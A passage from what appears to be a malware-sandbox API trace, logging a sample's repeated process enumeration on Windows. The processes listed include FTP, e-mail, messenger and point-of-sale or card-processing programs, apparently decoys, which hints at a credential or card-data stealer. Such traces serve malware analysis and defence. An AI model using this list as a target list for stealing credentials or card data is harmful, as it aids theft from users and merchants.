th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0283.430] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0283.432] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0283.437] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0283.439] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0283.441] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0283.443] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0283.445] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0283.446] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0283.483] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0283.485] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0283.487] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0283.489] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0283.491] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0283.493] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0283.497] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0283.499] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0283.501] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0283.503] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0283.505] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0283.506] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0283.508] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0283.510] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0283.515] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0283.517] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0283.519] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0283.521] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0283.522] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0283.524] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0283.575] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0283.578] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0283.580] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0283.582] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0283.584] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0283.586] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0283.588] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0283.593] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0283.595] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0283.597] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0283.598] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0283.600] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0283.601] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0283.603] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0283.607] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0283.610] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0283.612] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0283.615] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0283.616] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0283.618] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0283.664] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0283.666] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0283.668] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0283.669] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0283.671] CloseHandle (hObject=0x21f8) returned 1 [0283.671] Sleep (dwMilliseconds=0x64) [0283.776] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0283.797] Process32First (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.799] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0283.800] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0283.802] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0283.804] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0283.805] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0283.807] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0283.812] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0283.813] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0283.815] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.817] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.818] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0283.820] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.821] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.884] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.887] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.889] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.890] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.892] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.893] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0283.895] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0283.896] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0283.898] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.899] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0283.904] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0283.906] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0283.908] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0283.909] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0283.911] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.913] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0283.914] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0283.916] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: 